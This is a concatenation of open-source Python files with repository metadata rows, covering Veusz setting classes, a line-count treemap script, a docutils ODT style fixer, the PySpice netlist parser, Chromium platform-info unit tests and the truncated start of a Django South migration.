"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class AlignHorzWManual(Choice):
"""Alignment horizontally."""
typename = 'align-horz-+manual'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['left', 'centre', 'right', 'manual'],
value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class AlignVertWManual(Choice):
"""Alignment vertically."""
typename = 'align-vert-+manual'
def __init__(self, name, value, **args):
Choice.__init__(self, name, ['top', 'centre', 'bottom', 'manual'],
value, **args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
# Bool which shows/hides other settings
class BoolSwitch(Bool):
"""Bool switching setting."""
def __init__(self, name, value, settingsfalse=[], settingstrue=[],
**args):
"""Enables/disables a set of settings if True or False
settingsfalse and settingstrue are lists of names of settings
which are hidden/shown to user
"""
self.sfalse = settingsfalse
self.strue = settingstrue
Bool.__init__(self, name, value, **args)
def makeControl(self, *args):
return controls.BoolSwitch(self, *args)
def copy(self):
return self._copyHelper((), (), {'settingsfalse': self.sfalse,
'settingstrue': self.strue})
class ChoiceSwitch(Choice):
"""Show or hide other settings based on the choice given here."""
def __init__(self, name, vallist, value, settingstrue=[], settingsfalse=[],
showfn=lambda val: True, **args):
"""Enables/disables a set of settings if True or False
settingsfalse and settingstrue are lists of names of settings
which are hidden/shown to user depending on showfn(val)."""
self.sfalse = settingsfalse
self.strue = settingstrue
self.showfn = showfn
Choice.__init__(self, name, vallist, value, **args)
def makeControl(self, *args):
return controls.ChoiceSwitch(self, False, self.vallist, *args)
def copy(self):
return self._copyHelper((self.vallist,), (),
{'settingsfalse': self.sfalse,
'settingstrue': self.strue,
'showfn': self.showfn})
class FillStyleExtended(ChoiceSwitch):
"""A setting for the different fill styles provided by Qt."""
typename = 'fill-style-ext'
_strue = ( 'linewidth', 'linestyle', 'patternspacing',
'backcolor', 'backtransparency', 'backhide' )
@staticmethod
def _ishatch(val):
"""Is this a hatching fill?"""
return not ( val == 'solid' or val.find('dense') >= 0 )
def __init__(self, name, value, **args):
ChoiceSwitch.__init__(self, name, utils.extfillstyles, value,
settingstrue=self._strue, settingsfalse=(),
showfn=self._ishatch,
**args)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
def makeControl(self, *args):
return controls.FillStyleExtended(self, *args)
class RotateInterval(Choice):
'''Rotate a label with intervals given.'''
def __init__(self, name, val, **args):
Choice.__init__(self, name,
('-180', '-135', '-90', '-45',
'0', '45', '90', '135', '180'),
val, **args)
def normalize(self, val):
"""Store rotate angle."""
# backward compatibility with rotate option
# False: angle 0
# True: angle 90
if val == False:
val = '0'
elif val == True:
val = '90'
return Choice.normalize(self, val)
def copy(self):
"""Make a copy of the setting."""
return self._copyHelper((), (), {})
class Colormap(Str):
"""A setting to set the color map used in an image.
This is based on a Str rather than Choice as the list might
change later.
"""
def makeControl(self, *args):
return controls.Colormap(self, self.getDocument(), *args)
class AxisBound(FloatOrAuto):
"""Axis bound - either numeric, Auto or date."""
typename = 'axis-bound'
def makeControl(self, *args):
return controls.AxisBound(self, *args)
def toUIText(self):
"""Convert to text, taking into account mode of Axis.
Displays datetimes in date format if used
"""
try:
mode = self.parent.mode
except AttributeError:
mode = None
v = self.val
if ( not isinstance(v, cbasestr) and v is not None and
mode == 'datetime' ):
return utils.dateFloatToString(v)
return FloatOrAuto.toUIText(self)
def fromUIText(self, txt):
"""Convert from text, allowing datetimes."""
v = utils.dateStringToDate(txt)
if N.isfinite(v):
return v
else:
return FloatOrAuto.fromUIText(self, txt)
|
gpl-2.0
| 3,422,023,577,333,544,000
| 29.448004
| 81
| 0.560709
| false
| 4.152496
| false
| false
| false
|
johntellsall/shotglass
|
ex-treemap/tree.py
|
1
|
1087
|
import os
import sys
import matplotlib
matplotlib.use('svg')
import matplotlib.pyplot as plt
import pandas as pd
import squarify
DULL_DIRECTORIES = set(['.git'])
def count_lines(path):
with open(path) as f:
    return sum(1 for line in f)
# TODO make configurable
def walk_tree(topdir):
for root, dirs, files in os.walk(topdir):
dirs[:] = list(set(dirs) - DULL_DIRECTORIES)
for file in files:
yield os.path.join(root, file)
# TODO make configurable
def is_source(path):
return os.path.splitext(path)[-1] == '.py'
project_dir = sys.argv[1]
source_paths = list(filter(is_source, walk_tree(project_dir)))
line_counts = list(map(count_lines, source_paths))
names = list(map(os.path.basename, source_paths))
print(names)
df = pd.DataFrame({
'paths': source_paths,
'names': names})
df['line_counts'] = line_counts
# TODO zap items where line_count==0
print(line_counts)
squarify.plot(
sizes=df['line_counts'],
label=df['names'], alpha=.8)
plt.axis('off')
title = os.path.basename(project_dir).title()
plt.title(title)
plt.savefig('tree.png')
|
mit
| 9,175,307,799,650,051,000
| 21.183673
| 62
| 0.681693
| false
| 3.07932
| false
| false
| false
|
KungFuLucky7/stock_portfolios_server
|
venv/bin/rst2odt_prepstyles.py
|
1
|
1738
|
#!/Users/terrywong/stock_portfolios_server/venv/bin/python
# $Id: rst2odt_prepstyles.py 5839 2009-01-07 19:09:28Z dkuhlman $
# Author: Dave Kuhlman <dkuhlman@rexx.com>
# Copyright: This module has been placed in the public domain.
"""
Fix a word-processor-generated styles.odt for odtwriter use: Drop page size
specifications from styles.xml in STYLE_FILE.odt.
"""
#
# Author: Michael Schutte <michi@uiae.at>
from lxml import etree
import sys
import zipfile
from tempfile import mkstemp
import shutil
import os
NAMESPACES = {
"style": "urn:oasis:names:tc:opendocument:xmlns:style:1.0",
"fo": "urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"
}
def prepstyle(filename):
zin = zipfile.ZipFile(filename)
styles = zin.read("styles.xml")
root = etree.fromstring(styles)
for el in root.xpath("//style:page-layout-properties",
namespaces=NAMESPACES):
for attr in el.attrib:
if attr.startswith("{%s}" % NAMESPACES["fo"]):
del el.attrib[attr]
tempname = mkstemp()
zout = zipfile.ZipFile(os.fdopen(tempname[0], "w"), "w",
zipfile.ZIP_DEFLATED)
for item in zin.infolist():
if item.filename == "styles.xml":
zout.writestr(item, etree.tostring(root))
else:
zout.writestr(item, zin.read(item.filename))
zout.close()
zin.close()
shutil.move(tempname[1], filename)
def main():
args = sys.argv[1:]
if len(args) != 1:
print >> sys.stderr, __doc__
print >> sys.stderr, "Usage: %s STYLE_FILE.odt\n" % sys.argv[0]
sys.exit(1)
filename = args[0]
prepstyle(filename)
if __name__ == '__main__':
main()
# vim:tw=78:sw=4:sts=4:et:
|
gpl-2.0
| 5,343,714,636,521,661,000
| 24.940299
| 75
| 0.632911
| false
| 3.033159
| false
| false
| false
|
thomaslima/PySpice
|
PySpice/Spice/Parser.py
|
1
|
23694
|
####################################################################################################
#
# PySpice - A Spice Package for Python
# Copyright (C) 2014 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
"""This module implements a partial SPICE netlist parser.
It would be difficult to implement a full parser for Ngspice since the syntax is mainly contextual.
"""
####################################################################################################
import logging
####################################################################################################
from .ElementParameter import (
FlagParameter,
)
from .Netlist import ElementParameterMetaClass, NPinElement, Circuit
from .BasicElement import SubCircuitElement, BipolarJunctionTransistor
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
class PrefixData:
##############################################
def __init__(self, prefix, classes):
self.prefix = prefix
self.classes = classes
number_of_positionals_min = 1000
number_of_positionals_max = 0
has_optionals = False
for element_class in classes:
number_of_positionals = element_class.number_of_positional_parameters
number_of_positionals_min = min(number_of_positionals_min, number_of_positionals)
number_of_positionals_max = max(number_of_positionals_max, number_of_positionals)
has_optionals = max(has_optionals, bool(element_class.optional_parameters))
self.number_of_positionals_min = number_of_positionals_min
self.number_of_positionals_max = number_of_positionals_max
self.has_optionals = has_optionals
self.multi_devices = len(classes) > 1
self.npins = prefix in ('Q', 'X') # NPinElement, Q has 3 to 4 pins
if self.npins:
self.number_of_pins = None
else:
# remaining prefixes have a fixed pin count
self.number_of_pins = classes[0].number_of_pins
self.has_flag = False
for element_class in classes:
for parameter in element_class.optional_parameters.values():
if isinstance(parameter, FlagParameter):
self.has_flag = True
##############################################
def __len__(self):
return len(self.classes)
##############################################
def __iter__(self):
return iter(self.classes)
##############################################
@property
def single(self):
if not self.multi_devices:
return self.classes[0]
else:
raise NameError()
####################################################################################################
_prefix_cache = {prefix:PrefixData(prefix, classes)
for prefix, classes in ElementParameterMetaClass.__classes__.items()}
# for prefix_data in sorted(_prefix_cache.values(), key=lambda x: len(x)):
# print(prefix_data.prefix,
# len(prefix_data),
# prefix_data.number_of_positionals_min, prefix_data.number_of_positionals_max,
# prefix_data.has_optionals)
# Single:
# B 0 True
# D 1 True
# F 2 False
# G 1 False
# H 2 False
# I 1 False
# J 1 True
# K 3 False
# M 1 True
# S 2 False
# V 1 False
# W 3 False
# Z 1 True
# Two:
# E 0 1 False
# L 1 2 True
# Three:
# C 1 2 True
# R 1 2 True
# NPinElement:
# Q 1 1 True
# X 1 1 False
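# Illustrative sketch only (not part of PySpice): inspect the cached metadata
# for a device prefix, assuming the standard element classes have been
# registered; 'R' (resistor) is used as an arbitrary example.
def _example_prefix_lookup(prefix='R'):
    data = _prefix_cache[prefix]
    return (data.number_of_pins, data.number_of_positionals_min,
            data.multi_devices, data.has_optionals)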
####################################################################################################
class Token:
""" This class implements a token, in fact a line in a Spice netlist. """
##############################################
def __init__(self, line):
self._line = line
##############################################
def __repr__(self):
return "{} {}".format(self.__class__.__name__, repr(self._line))
####################################################################################################
class Comment(Token):
pass
####################################################################################################
class Title(Token):
""" This class implements a title definition. """
##############################################
def __init__(self, line):
super().__init__(line)
self._title = self._line.read_right_of('.title')
##############################################
def __str__(self):
return self._title
##############################################
def __repr__(self):
return "Title {}".format(self._title)
####################################################################################################
class Include(Token):
""" This class implements a include definition. """
##############################################
def __init__(self, line):
super().__init__(line)
self._include = self._line.read_right_of('.include')
##############################################
def __str__(self):
return self._include
##############################################
def __repr__(self):
return "Include {}".format(self._title)
####################################################################################################
class Model(Token):
""" This class implements a model definition.
Spice syntax::
.model mname type (pname1=pval1 pname2=pval2)
"""
##############################################
def __init__(self, line):
super().__init__(line)
# Fixme
parameters, dict_parameters = self._line.split_line('.model')
self._name, self._model_type = parameters[:2]
self._parameters = dict_parameters
##############################################
@property
def name(self):
""" Name of the model """
return self._name
##############################################
def __repr__(self):
return "Model {} {} {}".format(self._name, self._model_type, self._parameters)
####################################################################################################
class SubCircuit(Token):
""" This class implements a sub-circuit definition.
Spice syntax::
.SUBCKT name node1 ... param1=value1 ...
"""
##############################################
def __init__(self, line):
super().__init__(line)
# Fixme:
parameters, dict_parameters = self._line.split_line('.subckt')
self._name, self._nodes = parameters[0], parameters[1:]
self._tokens = []
##############################################
@property
def name(self):
""" Name of the sub-circuit. """
return self._name
##############################################
def __repr__(self):
text = "SubCircuit {} {}\n".format(self._name, self._nodes)
text += '\n'.join([' ' + repr(token) for token in self._tokens])
return text
##############################################
def __iter__(self):
""" Return an iterator on the tokens. """
return iter(self._tokens)
##############################################
def append(self, token):
""" Append a token to the token's list. """
self._tokens.append(token)
####################################################################################################
class Element(Token):
""" This class implements an element definition.
"{ expression }" are allowed in device line.
"""
_logger = _module_logger.getChild('Element')
##############################################
def __init__(self, line):
super().__init__(line)
line_str = str(line)
# self._logger.debug('\n' + line_str)
# Retrieve device prefix
self._prefix = line_str[0]
prefix_data = _prefix_cache[self._prefix]
# Retrieve device name
start_location = 1
stop_location = line_str.find(' ')
# Fixme: if stop_location == -1:
self._name = line_str[start_location:stop_location]
self._nodes = []
self._parameters = []
self._dict_parameters = {}
# Read nodes
if not prefix_data.npins:
number_of_pins = prefix_data.number_of_pins
if number_of_pins:
self._nodes, stop_location = self._line.read_words(stop_location, number_of_pins)
else: # Q or X
if prefix_data.prefix == 'Q':
self._nodes, stop_location = self._line.read_words(stop_location, 3)
# Fixme: optional node
else: # X
args, stop_location = self._line.split_words(stop_location, until='=')
self._nodes = args[:-1]
self._parameters.append(args[-1]) # model name
# Read positionals
number_of_positionals = prefix_data.number_of_positionals_min
if number_of_positionals and stop_location is not None: # model is optional
self._parameters, stop_location = self._line.read_words(stop_location, number_of_positionals)
if prefix_data.multi_devices and stop_location is not None:
remaining, stop_location = self._line.split_words(stop_location, until='=')
self._parameters.extend(remaining)
if prefix_data.prefix in ('V', 'I') and stop_location is not None:
# merge remaining
self._parameters[-1] += line_str[stop_location:]
# Read optionals
if prefix_data.has_optionals and stop_location is not None:
kwargs, stop_location = self._line.split_words(stop_location)
for kwarg in kwargs:
try:
key, value = kwarg.split('=')
self._dict_parameters[key] = value
except ValueError:
if kwarg in ('off',) and prefix_data.has_flag:
self._dict_parameters['off'] = True
else:
self._logger.warn(line_str)
# raise NameError("Bad element line:", line_str)
if prefix_data.multi_devices:
for element_class in prefix_data:
if len(self._parameters) == element_class.number_of_positional_parameters:
break
else:
element_class = prefix_data.single
self.factory = element_class
# Move positionals passed as kwarg
to_delete = []
for parameter in element_class.positional_parameters.values():
if parameter.key_parameter:
i = parameter.position
self._dict_parameters[parameter.attribute_name] = self._parameters[i]
to_delete.append(i)
for i in to_delete:
del self._parameters[i]
self._logger.debug('\n' + self.__repr__())
##############################################
@property
def name(self):
""" Name of the element """
return self._name
##############################################
def __repr__(self):
return "Element {0._prefix} {0._name} {0._nodes} {0._parameters} {0._dict_parameters}".format(self)
####################################################################################################
class Line:
""" This class implements a line in the netlist. """
##############################################
def __init__(self, text, line_range):
text = str(text)
for marker in ('$', ';', '//'):
location = text.find(marker)
if location != -1:
break
if location != -1:
comment = text[location:]
text = text[:location]
else:
comment = ''
self._text = text
self._comment = comment
self._line_range = line_range
##############################################
def __repr__(self):
return "{0._line_range} {0._text}".format(self)
##############################################
def __str__(self):
return self._text
##############################################
def read_right_of(self, text):
return self._text[len(text):].strip()
##############################################
def read_words(self, start_location, number_of_words):
line_str = self._text
number_of_words_read = 0
words = []
while number_of_words_read < number_of_words: # and start_location < len(line_str)
stop_location = line_str.find(' ', start_location)
if stop_location == -1:
stop_location = None # read until end
word = line_str[start_location:stop_location].strip()
if word:
number_of_words_read += 1
words.append(word)
if stop_location is None: # we should stop
if number_of_words_read != number_of_words:
template = "Bad element line, looking for word {}/{}:\n"
raise NameError(template.format(number_of_words_read, number_of_words) +
line_str + '\n' +
' '*start_location + '^')
else:
if start_location < stop_location:
start_location = stop_location
else: # we have read a space
start_location += 1
return words, stop_location
##############################################
def split_words(self, start_location, until=None):
line_str = self._text
stop_location = None
if until is not None:
location = line_str.find(until, start_location)
if location != -1:
stop_location = location
location = line_str.rfind(' ', start_location, stop_location)
if location != -1:
stop_location = location
else:
raise NameError("Bad element line, missing key? " + line_str)
line_str = line_str[start_location:stop_location]
words = [x for x in line_str.split(' ') if x]
return words, stop_location
##############################################
def split_line(self, keyword):
""" Split the line according to the following pattern::
keyword parameter1 parameter2 ... key1=value1 key2=value2 ...
        Return the list of parameters and the dictionary.
"""
raw_parameters = self._text[len(keyword):].split()
parameters = []
dict_parameters = {}
for parameter in raw_parameters:
if '=' in parameter:
key, value = parameter.split('=')
dict_parameters[key.strip()] = value.strip()
else:
parameters.append(parameter)
return parameters, dict_parameters
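    # Example: for a Line whose text is
    #     ".model MyDiode D is=1e-14 rs=10"
    # split_line('.model') is expected to return
    #     (['MyDiode', 'D'], {'is': '1e-14', 'rs': '10'})
    # since every token containing '=' goes into the dictionary and the
    # remaining tokens are kept as positional parameters, in order.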
####################################################################################################
class SpiceParser:
""" This class parse a Spice netlist file and build a syntax tree.
Public Attributes:
:attr:`circuit`
:attr:`models`
:attr:`subcircuits`
"""
_logger = _module_logger.getChild('SpiceParser')
##############################################
def __init__(self, path=None, source=None):
# Fixme: empty source
if path is not None:
with open(str(path), 'r') as f:
raw_lines = f.readlines()
elif source is not None:
raw_lines = source.split('\n') # Fixme: other os
else:
raise ValueError
lines = self._merge_lines(raw_lines)
self._title = None
self._tokens = self._parse(lines)
self._find_sections()
##############################################
def _merge_lines(self, raw_lines):
"""Merge broken lines and return a new list of lines.
A line starting with "+" continues the preceding line.
"""
# Fixme: better using lines[-1] ?
lines = []
current_line = ''
current_line_index = None
for line_index, line in enumerate(raw_lines):
if line.startswith('+'):
current_line += ' ' + line[1:].strip()
else:
if current_line:
lines.append(Line(current_line, slice(current_line_index, line_index)))
current_line = line.strip()
current_line_index = line_index
if current_line:
lines.append(Line(current_line, slice(current_line_index, len(raw_lines))))
return lines
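    # For instance, the two raw lines
    #     ".model MyDiode D"
    #     "+ is=1e-14 rs=10"
    # are merged into a single Line whose text is
    #     ".model MyDiode D is=1e-14 rs=10"
    # and whose line_range spans both source lines.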
##############################################
def _parse(self, lines):
""" Parse the lines and return a list of tokens. """
tokens = []
sub_circuit = None
scope = tokens
for line in lines:
# print repr(line)
text = str(line)
lower_case_text = text.lower() # !
if text.startswith('*'):
scope.append(Comment(line))
elif lower_case_text.startswith('.'):
lower_case_text = lower_case_text[1:]
if lower_case_text.startswith('subckt'):
sub_circuit = SubCircuit(line)
tokens.append(sub_circuit)
scope = sub_circuit
elif lower_case_text.startswith('ends'):
sub_circuit = None
scope = tokens
elif lower_case_text.startswith('title'):
self._title = Title(line)
scope.append(self._title)
elif lower_case_text.startswith('end'):
pass
elif lower_case_text.startswith('model'):
model = Model(line)
scope.append(model)
elif lower_case_text.startswith('include'):
scope.append(Include(line))
else:
# options param ...
# .global
# .lib filename libname
# .param
# .func .csparam .temp .if
# { expr } are allowed in .model lines and in device lines.
self._logger.warn(line)
else:
element = Element(line)
scope.append(element)
return tokens
##############################################
def _find_sections(self):
""" Look for model, sub-circuit and circuit definitions in the token list. """
self.circuit = None
self.subcircuits = []
self.models = []
for token in self._tokens:
if isinstance(token, Title):
if self.circuit is None:
self.circuit = token
else:
raise NameError("More than one title")
elif isinstance(token, SubCircuit):
self.subcircuits.append(token)
elif isinstance(token, Model):
self.models.append(token)
##############################################
def is_only_subcircuit(self):
return bool(not self.circuit and self.subcircuits)
##############################################
def is_only_model(self):
return bool(not self.circuit and not self.subcircuits and self.models)
##############################################
def build_circuit(self, ground=0):
ground = str(ground)
circuit = Circuit(str(self._title))
for token in self._tokens:
if isinstance(token, Include):
circuit.include(str(token))
for token in self._tokens:
if isinstance(token, Element):
factory = getattr(circuit, token.factory.alias)
nodes = []
for node in token._nodes:
if str(node) == ground:
node = 0
nodes.append(node)
if token._prefix != 'X':
args = nodes + token._parameters
else: # != Spice
args = token._parameters + nodes
kwargs = token._dict_parameters
message = ' '.join([str(x) for x in (token._prefix, token._name, nodes,
token._parameters, token._dict_parameters)])
self._logger.debug(message)
factory(token._name, *args, **kwargs)
return circuit
##############################################
def _to_python(self, value):
try:
            float_value = float(value)
            int_value = int(float_value)
            if int_value == float_value:
                return str(int_value)
            else:
                return str(float_value)
except ValueError:
return "'{}'".format(value)
##############################################
def to_python_code(self, ground=0):
ground = str(ground)
# for token in self._tokens:
# if isinstance(token, Include):
# circuit.include(str(token))
if self._title:
title = self._title
else:
title = '...'
circuit = "circuit = Circuit('{}')\n".format(title)
for token in self._tokens:
if isinstance(token, Element):
nodes = []
for node in token._nodes:
if str(node) == ground:
node = 0
nodes.append(node)
if token._prefix != 'X':
args = nodes + token._parameters
else: # != Spice
args = token._parameters + nodes
args = [self._to_python(x) for x in args]
kwargs = ['{}={}'.format(key, self._to_python(value))
for key, value in token._dict_parameters.items()]
parameters = ', '.join(args + kwargs)
circuit += "circuit.{}({})\n".format(token._prefix, parameters)
return circuit
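    # Illustrative output for a hypothetical element line "R1 1 2 10k"
    # (with ground node 0): the generated source would contain something like
    #     circuit = Circuit('...')
    #     circuit.R(1, 2, '10k')
    # Note that, unlike build_circuit(), only the element prefix is emitted
    # here and the element name is not passed as an argument.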
####################################################################################################
#
# End
#
####################################################################################################
|
gpl-3.0
| -8,791,368,678,577,161,000
| 30.676471
| 107
| 0.447666
| false
| 4.901531
| false
| false
| false
|
chromium/chromium
|
third_party/blink/tools/blinkpy/common/system/platform_info_unittest.py
|
7
|
11345
|
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import platform
import sys
import unittest
from blinkpy.common.system.executive import Executive
from blinkpy.common.system.executive_mock import MockExecutive
from blinkpy.common.system.filesystem import FileSystem
from blinkpy.common.system.filesystem_mock import MockFileSystem
from blinkpy.common.system.platform_info import PlatformInfo
def fake_sys(platform_str='darwin', windows_version_tuple=None):
class FakeSysModule(object):
platform = platform_str
if windows_version_tuple:
getwindowsversion = lambda x: windows_version_tuple
return FakeSysModule()
def fake_platform(mac_version_string='10.12.3',
release_string='bar',
linux_version='trusty'):
class FakePlatformModule(object):
def mac_ver(self):
return tuple([mac_version_string, tuple(['', '', '']), 'i386'])
def linux_distribution(self):
return tuple([None, None, linux_version])
def platform(self):
return 'foo'
def release(self):
return release_string
return FakePlatformModule()
def fake_executive(output=None):
if output:
return MockExecutive(output=output)
return MockExecutive(exception=SystemError)
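# The three fakes above are composed by TestPlatformInfo.make_info() below.
# For example (mirroring the version checks further down):
#     info = PlatformInfo(fake_sys('darwin'), fake_platform('10.14.2'),
#                         MockFileSystem(), fake_executive())
#     info.os_version  # expected: 'mac10.14'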
class TestPlatformInfo(unittest.TestCase):
def make_info(self,
sys_module=None,
platform_module=None,
filesystem_module=None,
executive=None):
return PlatformInfo(sys_module or fake_sys(), platform_module
or fake_platform(), filesystem_module
or MockFileSystem(), executive or fake_executive())
def test_real_code(self):
# This test makes sure the real (unmocked) code actually works.
info = PlatformInfo(sys, platform, FileSystem(), Executive())
self.assertNotEquals(info.os_name, '')
self.assertNotEquals(info.os_version, '')
self.assertNotEquals(info.display_name(), '')
self.assertTrue(info.is_mac() or info.is_win() or info.is_linux()
or info.is_freebsd())
self.assertIsNotNone(info.terminal_width())
if info.is_linux():
self.assertIsNotNone(info.linux_distribution())
if info.is_mac():
self.assertTrue(info.total_bytes_memory() > 0)
else:
self.assertIsNone(info.total_bytes_memory())
def test_os_name_and_wrappers(self):
info = self.make_info(fake_sys('linux2'))
self.assertTrue(info.is_linux())
self.assertFalse(info.is_mac())
self.assertFalse(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('linux3'))
self.assertTrue(info.is_linux())
self.assertFalse(info.is_mac())
self.assertFalse(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('darwin'), fake_platform('10.12.3'))
self.assertEqual(info.os_name, 'mac')
self.assertFalse(info.is_linux())
self.assertTrue(info.is_mac())
self.assertFalse(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('win32', tuple([6, 1, 7600])))
self.assertEqual(info.os_name, 'win')
self.assertFalse(info.is_linux())
self.assertFalse(info.is_mac())
self.assertTrue(info.is_win())
self.assertFalse(info.is_freebsd())
info = self.make_info(fake_sys('freebsd8'))
self.assertEqual(info.os_name, 'freebsd')
self.assertFalse(info.is_linux())
self.assertFalse(info.is_mac())
self.assertFalse(info.is_win())
self.assertTrue(info.is_freebsd())
with self.assertRaises(AssertionError):
self.make_info(fake_sys('vms'))
def test_os_version(self):
with self.assertRaises(AssertionError):
self.make_info(fake_sys('darwin'), fake_platform('10.6.3'))
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.10.0')).os_version, 'mac10.10')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.11.0')).os_version, 'mac10.11')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.12.0')).os_version, 'mac10.12')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.13.0')).os_version, 'mac10.13')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.14.0')).os_version, 'mac10.14')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.15.0')).os_version, 'mac10.15')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('10.16.0')).os_version, 'mac10.16')
self.assertEqual(
self.make_info(fake_sys('darwin'),
fake_platform('11.0.0')).os_version, 'mac11.0')
with self.assertRaises(AssertionError):
self.make_info(fake_sys('darwin'), fake_platform('10.20.0'))
self.assertEqual(
self.make_info(fake_sys('linux2')).os_version, 'trusty')
info = self.make_info(
fake_sys('linux2'), fake_platform(linux_version='utopic'))
self.assertEqual(info.os_version, 'trusty')
self.assertEqual(
self.make_info(
fake_sys('freebsd8'), fake_platform(
'', '8.3-PRERELEASE')).os_version, '8.3-PRERELEASE')
self.assertEqual(
self.make_info(
fake_sys('freebsd9'),
fake_platform('', '9.0-RELEASE')).os_version, '9.0-RELEASE')
with self.assertRaises(AssertionError):
self.make_info(fake_sys('win32', tuple([5, 0, 1234])))
with self.assertRaises(AssertionError):
self.make_info(fake_sys('win32', tuple([6, 1, 1234])))
self.assertEqual(
self.make_info(fake_sys('win32', tuple([10, 1, 1234]))).os_version,
'future')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([10, 0, 1234]))).os_version,
'10')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 3, 1234]))).os_version,
'8.1')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 2, 1234]))).os_version,
'8')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 1, 7601]))).os_version,
'7sp1')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 1, 7600]))).os_version,
'7sp0')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([6, 0, 1234]))).os_version,
'vista')
self.assertEqual(
self.make_info(fake_sys('win32', tuple([5, 1, 1234]))).os_version,
'xp')
with self.assertRaises(AssertionError):
self.make_info(
fake_sys('win32'), executive=fake_executive('5.0.1234'))
with self.assertRaises(AssertionError):
self.make_info(
fake_sys('win32'), executive=fake_executive('6.1.1234'))
def _assert_files_imply_linux_distribution(self, file_paths, distribution):
fs_module = MockFileSystem({file_path: '' for file_path in file_paths})
info = self.make_info(
sys_module=fake_sys('linux2'), filesystem_module=fs_module)
self.assertEqual(info.linux_distribution(), distribution)
def test_linux_distro_detection(self):
self._assert_files_imply_linux_distribution(['/etc/arch-release'],
'arch')
self._assert_files_imply_linux_distribution(['/etc/debian_version'],
'debian')
self._assert_files_imply_linux_distribution(['/etc/fedora-release'],
'fedora')
self._assert_files_imply_linux_distribution(
['/etc/fedora-release', '/etc/redhat-release'], 'fedora')
self._assert_files_imply_linux_distribution(['/etc/redhat-release'],
'redhat')
self._assert_files_imply_linux_distribution(['/etc/mock-release'],
'unknown')
def test_display_name(self):
info = self.make_info(fake_sys('darwin'))
self.assertNotEquals(info.display_name(), '')
info = self.make_info(fake_sys('win32', tuple([6, 1, 7600])))
self.assertNotEquals(info.display_name(), '')
info = self.make_info(fake_sys('linux2'))
self.assertNotEquals(info.display_name(), '')
info = self.make_info(fake_sys('freebsd9'))
self.assertNotEquals(info.display_name(), '')
def test_total_bytes_memory(self):
info = self.make_info(
fake_sys('darwin'),
fake_platform('10.12.3'),
executive=fake_executive('1234'))
self.assertEqual(info.total_bytes_memory(), 1234)
info = self.make_info(fake_sys('win32', tuple([6, 1, 7600])))
self.assertIsNone(info.total_bytes_memory())
info = self.make_info(fake_sys('linux2'))
self.assertIsNone(info.total_bytes_memory())
info = self.make_info(fake_sys('freebsd9'))
self.assertIsNone(info.total_bytes_memory())
def test_unsupported_platform(self):
with self.assertRaises(AssertionError):
self.make_info(fake_sys('cygwin'))
|
bsd-3-clause
| -1,177,675,067,622,290,200
| 40.863469
| 79
| 0.600264
| false
| 3.991907
| true
| false
| false
|
Tangxuguo/Django_SNS
|
osf/post/migrations/0001_initial.py
|
1
|
4772
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Post'
db.create_table(u'post_post', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('author', self.gf('django.db.models.fields.IntegerField')()),
